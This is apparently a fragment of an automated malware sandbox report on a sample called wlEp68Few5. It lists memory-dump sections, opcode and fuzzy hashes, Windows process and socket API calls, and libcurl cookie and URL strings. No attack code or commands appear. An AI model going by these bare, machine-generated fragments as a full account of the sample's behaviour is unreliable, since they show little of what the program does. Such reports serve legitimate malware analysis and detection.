                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 601c859a63f5a4a54362263bac400fef458528d80ae681aca1841a23ec848134
                                                      • Instruction ID: 4c8fd19354632ab943d3b7515756075cb0cc63fb9d1c578228f929f76490fa55
                                                      • Opcode Fuzzy Hash: 601c859a63f5a4a54362263bac400fef458528d80ae681aca1841a23ec848134
                                                      • Instruction Fuzzy Hash: CF41C5E726C221FD714E91E52F549FB676EE5DB730B32852ABC13C55C2E3840B4A5071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15f4540a57121c9129fb9d99adaa76381a3a3c27a2a9cbe4536b08cdee332f5c
                                                      • Instruction ID: 8e57b50079cedc5922baf8f28186c45d7b7d53a910e29c5e261ba0a9ed1b41ea
                                                      • Opcode Fuzzy Hash: 15f4540a57121c9129fb9d99adaa76381a3a3c27a2a9cbe4536b08cdee332f5c
                                                      • Instruction Fuzzy Hash: 4D4191E722C121FD714E91E52F64AFB576EE5DB730B32852AFC27C5982E3840A4A5071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25fb91f36a729f2076c1e59ddfe0f36149cfbb8896851a90a4ff5dae9d228621
                                                      • Instruction ID: 59e56b8c6415937471646284c877730ad524ba054bdc8e6874384bbbae60520b
                                                      • Opcode Fuzzy Hash: 25fb91f36a729f2076c1e59ddfe0f36149cfbb8896851a90a4ff5dae9d228621
                                                      • Instruction Fuzzy Hash: C141C3E722C121FDB14E81E52F64AFB572EE6DB730B328527FC23C1982E3840A4A5171
                                                      APIs
                                                      • Process32FirstW.KERNEL32(07150245,07150245,07150245), ref: 07150588
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: e92ccfc0a0f42d9f241ff412e08997915476f45e3eb737888ccf1b4f9ca21241
                                                      • Instruction ID: 1f3ed129ce7ba7f15b11806d820748c711afd38151d03f378dc5962a00b7590b
                                                      • Opcode Fuzzy Hash: e92ccfc0a0f42d9f241ff412e08997915476f45e3eb737888ccf1b4f9ca21241
                                                      • Instruction Fuzzy Hash: C6419FE722C121FD714E81E52F64AFA576EE5DB730B328527FC27C5682E3840A4A5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96a63e0c4a7f3fb379ea4bb7c4c60c189c02deeda3fad85a9ea23291c98ebc2e
                                                      • Instruction ID: 042547f4c73132d26ee15ced263c62ef78f2ec1bab691cc6e71b623278f30885
                                                      • Opcode Fuzzy Hash: 96a63e0c4a7f3fb379ea4bb7c4c60c189c02deeda3fad85a9ea23291c98ebc2e
                                                      • Instruction Fuzzy Hash: FC41A0E722C221FDB10E81E52F649FB676EE5DB730B328526FC23C5582E3840E4A5171
                                                      APIs
                                                      • gethostname.WS2_32(00000000,00000040), ref: 00524AA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                       • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: gethostname
                                                      • String ID:
                                                      • API String ID: 144339138-0
                                                      • Opcode ID: 004738adf744e4e4e091d75b3cfb32c9f8670c60d5fffa404fcb88b536cd6560
                                                      • Instruction ID: d7c5147e07fd2b540b4b5bcbcf394e25449038a3aa5a0ddd4eaafbc33938ea32
                                                      • Opcode Fuzzy Hash: 004738adf744e4e4e091d75b3cfb32c9f8670c60d5fffa404fcb88b536cd6560
                                                      • Instruction Fuzzy Hash: 2751BEB06047218BEB30DB25ED497277EE4BF46719F14183CE98A8A6D1E775E884CF02
                                                      APIs
                                                      • Process32FirstW.KERNEL32(07150245,07150245,07150245), ref: 07150588
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      APIs
                                                      • Process32FirstW.KERNEL32(07150245,07150245,07150245), ref: 07150588
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462519674.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0053AFD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID:
                                                      • API String ID: 3358416759-0
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0053A97F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      APIs
                                                      • socket.WS2_32(?,0053B280,00000000,-00000001,00000000,0053B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0053AF67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID:
                                                      • API String ID: 98920635-0
                                                      APIs
                                                      • closesocket.WS2_32(?,00539422,?,?,?,?,?,?,?,?,?,?,?,w3R,008B7680,00000000), ref: 0053B04D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      APIs
                                                      • ioctlsocket.WS2_32(?,8004667E,?,?,004AAF56,?,00000001), ref: 004D67FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocket
                                                      • String ID:
                                                      • API String ID: 3577187118-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 951b693771009eab9006dac4611c6b4e16e86659f84b1ddc0eaa47f7380f1dac
                                                      • Instruction ID: f546967a3a5f4d1323a02c2b9b3c42d1bc6b586a476dccbc04905cb1846e09ee
                                                      • Opcode Fuzzy Hash: 951b693771009eab9006dac4611c6b4e16e86659f84b1ddc0eaa47f7380f1dac
                                                      • Instruction Fuzzy Hash: 6D41DDEB25C254BDB602C1816B54AFFBB7EE6C7730B30852BF912D6903E2944E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a541f6559333055b53cc15a3148aea7101a9cf2597205c3dd669fa891cdf103c
                                                      • Instruction ID: 059c8114edff2536d69e5b581ca65ad26f530056432a5c1bdc22c8931589b9ff
                                                      • Opcode Fuzzy Hash: a541f6559333055b53cc15a3148aea7101a9cf2597205c3dd669fa891cdf103c
                                                      • Instruction Fuzzy Hash: 6A31C9EB25C254BEB10281816B54AFFAB7EE6C7330B30892BF913D2903E2984E4D5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d17ebe98dc5b7c29246e241f84b09c6f2c1d4781581fed1891fdc6dff038698b
                                                      • Instruction ID: a15bf8f094307896ff1a951f2c2148a847a38465c7fb03c3c7a0e04e8ff92c14
                                                      • Opcode Fuzzy Hash: d17ebe98dc5b7c29246e241f84b09c6f2c1d4781581fed1891fdc6dff038698b
                                                      • Instruction Fuzzy Hash: 8731ADEB249154BDB10280816F24AFFAB3EE6D7730B318527F912D1903E2985E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8a89196cea00763946299b16db181941aa254ec2b812f836f31c95151f12aea
                                                      • Instruction ID: c48951b14c31bb3ae5389f4d17c88662703fe2291ac09f22a916f4982443c2b4
                                                      • Opcode Fuzzy Hash: d8a89196cea00763946299b16db181941aa254ec2b812f836f31c95151f12aea
                                                      • Instruction Fuzzy Hash: 623167EF298114BDB14281816B14AFFA77EE6C7730B30852BF913D2903E2945E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fa0611e3f3a0ebbc51d7b6a5a060e6d800600c7f2c510871cb5befafc495f79
                                                      • Instruction ID: ca5e0df878c6af84165c659cb0d9ef143eab6c94e0d7df7930204f80be0629b2
                                                      • Opcode Fuzzy Hash: 6fa0611e3f3a0ebbc51d7b6a5a060e6d800600c7f2c510871cb5befafc495f79
                                                      • Instruction Fuzzy Hash: F231AAEB248114BDB50280816B14AFFA77EE6C7330B30853BF913D2A03E2D85E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5edfd04a7ef8d85c2db21580b924471fc51981120f6c38cc6b32c91148144e74
                                                      • Instruction ID: 24df69054cc3e330e272484729d5543fd957a74f131d8685b662b82654845943
                                                      • Opcode Fuzzy Hash: 5edfd04a7ef8d85c2db21580b924471fc51981120f6c38cc6b32c91148144e74
                                                      • Instruction Fuzzy Hash: AB3169EF248114BDB50280826F64AFFA73EE6D7730B31852BF913D1903E2985E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d58cf0ac21a6c702809671b71e23f4cab03a8e847b3a11451720e57800688562
                                                      • Instruction ID: e4f501fc0206a34a835a14e6cd488b7366bfd4448ff37981c0001154497e172c
                                                      • Opcode Fuzzy Hash: d58cf0ac21a6c702809671b71e23f4cab03a8e847b3a11451720e57800688562
                                                      • Instruction Fuzzy Hash: C92146EF288124BDB54280822B64AFFA76EE2C7730B318527F913D1903E2985E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91956edc2c1ce30e04918757b06c9c482297a2aa572f5fa9524c1bab2fe88e5d
                                                      • Instruction ID: a1d8858cfb8c266ea3061bd7cca5e0b6ca2bdae06f68e280c89a56ed9cb5464c
                                                      • Opcode Fuzzy Hash: 91956edc2c1ce30e04918757b06c9c482297a2aa572f5fa9524c1bab2fe88e5d
                                                      • Instruction Fuzzy Hash: 38214AEF248154BDB54281822B64AFFA77EE6D7730B31853BF912D2903E2D84E5E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bda5efbbfd474cb46e199c0668d7ee4dfafa456034a82cae790b0919fb8b8a9
                                                      • Instruction ID: eedd091d589f6c0809456b8282bd20ee5bec86e4369dda54e09eb9a01d57db51
                                                      • Opcode Fuzzy Hash: 7bda5efbbfd474cb46e199c0668d7ee4dfafa456034a82cae790b0919fb8b8a9
                                                      • Instruction Fuzzy Hash: D1219CEF248214BDB60295826B64AFFA77EE6C7730B31853AF803D2903E2954E4E5130
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83d84a65a3bf20b15071bf6f170ad6f671e1eef6d7e904618ffe4dac2a481064
                                                      • Instruction ID: e4bdda9ce3a7e55b458d6c600528deceb736b7c68e55cd24c55efc5dfb6a2b67
                                                      • Opcode Fuzzy Hash: 83d84a65a3bf20b15071bf6f170ad6f671e1eef6d7e904618ffe4dac2a481064
                                                      • Instruction Fuzzy Hash: 182158EF2482547DB54281826B24AFFA73EE6C7730B31893BF912D2903E2990E4E5131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b692db51a9a74f421f98d1d10629588c42f09f7811647c46ee359edf34d1cf6c
                                                      • Instruction ID: ef13d262a3ca2417600fca596dda5535e9ba3a86112edbc136351bb99cea97c2
                                                      • Opcode Fuzzy Hash: b692db51a9a74f421f98d1d10629588c42f09f7811647c46ee359edf34d1cf6c
                                                      • Instruction Fuzzy Hash: 2711CEEB248214BEB50291816F60BFFAB7EE7D7730B318936F912D2643E2980E4D5130
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8309901a8253a7921ee971393bb03c925b728d39615e3b9e32fffd5fd90f292d
                                                      • Instruction ID: 244aa0fb77ae70c6648b66ee5fa1f4476b0b50de0c37aa476d63016205f4cc85
                                                      • Opcode Fuzzy Hash: 8309901a8253a7921ee971393bb03c925b728d39615e3b9e32fffd5fd90f292d
                                                      • Instruction Fuzzy Hash: 1311BCEB248214BDB50281826B24BFFA73EE7D3730B31857AF902D2903E2950E4D5130
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce178e5397159433d024e1a4f604244625676c25db9fb39359eba0b35caa106d
                                                      • Instruction ID: 5d2e0c05fc32a649963308c92ec1efa141e4a651d6d4e9855953645adfe2062e
                                                      • Opcode Fuzzy Hash: ce178e5397159433d024e1a4f604244625676c25db9fb39359eba0b35caa106d
                                                      • Instruction Fuzzy Hash: 45116DEB2482687DB54290822F54BFFA77EE6D7730B318576F902D2903E2D90E9D5131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                      • API String ID: 0-1371176463
                                                      • Opcode ID: 9fba57bba2b6fc5809c4196d3f5a9eef47ebe26c71ced4fae66cf0f383c15907
                                                      • Instruction ID: b6694bac6e49c080b840184a7aabe1c9a0e86582476d28273d960de1181dad7e
                                                      • Opcode Fuzzy Hash: 9fba57bba2b6fc5809c4196d3f5a9eef47ebe26c71ced4fae66cf0f383c15907
                                                      • Instruction Fuzzy Hash: 9BB25C70A04700ABD7249F25DD56BA77BD5AF44308F08482EF88997392E7BDEC40D76A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                      • API String ID: 0-122532811
                                                      • Opcode ID: 15ec0530d6688f3b84d3ca32176359bff026b7b147690e64d8822460cc3e3b45
                                                      • Instruction ID: a17eb541e4b84596458aec19b17c1b8e8f740546424a38eec7e0dc1c5ee8fa24
                                                      • Opcode Fuzzy Hash: 15ec0530d6688f3b84d3ca32176359bff026b7b147690e64d8822460cc3e3b45
                                                      • Instruction Fuzzy Hash: 9E42E8B1B08701AFD718EE24CC81B6BB6EAEBC4704F04891DF65D97391D779A8148B92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                      • API String ID: 0-3977460686
                                                      • Opcode ID: b464fd8fa310f0639725c89fe5a3762f6f29bb30f76b285e54b66d4a97e4925f
                                                      • Instruction ID: e94f72d6cc0b39d0d1879ff2f1cbab6f659298b0f404f5466a4e86a879cac0dc
                                                      • Opcode Fuzzy Hash: b464fd8fa310f0639725c89fe5a3762f6f29bb30f76b285e54b66d4a97e4925f
                                                      • Instruction Fuzzy Hash: 7B3208B1A083028BC724BE289C4131F7BD56BD1324F154F2FE9A59B3D1E63CD945879A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                      • API String ID: 0-1914377741
                                                      • Opcode ID: f7579766d5512b66d62325cb09bb211207945020e4041e6348a06901ab9f3f5c
                                                      • Instruction ID: c81111dc1f97d41a57c4b63542807ef785fb42f82238d81b8a6e14bd5aaa3c08
                                                      • Opcode Fuzzy Hash: f7579766d5512b66d62325cb09bb211207945020e4041e6348a06901ab9f3f5c
                                                      • Instruction Fuzzy Hash: 04720830608B415FEF228A28C4467A77BD25F91344F28863EED855B393E77ED884C74A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                      • API String ID: 0-2058201250
                                                      • Opcode ID: a5647a3e52ec519a1f407b6fb033783a52d6bf8214ffa1ffc8498effd50edce8
                                                      • Instruction ID: 09b7e3b87758ce6d45afea10a15834da9fc4ff238a829a031a3bd11cf984671e
                                                      • Opcode Fuzzy Hash: a5647a3e52ec519a1f407b6fb033783a52d6bf8214ffa1ffc8498effd50edce8
                                                      • Instruction Fuzzy Hash: D061E7A5A0831567E714A620BC57B3BBA99BFD6344F04883DFC8A973C2FE71D9448253
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                      • API String ID: 0-3476178709
                                                      • Opcode ID: 197e59cd6d6e91faccd6387b90feb27cb97c340f8229a46bd29646b8ab6d8378
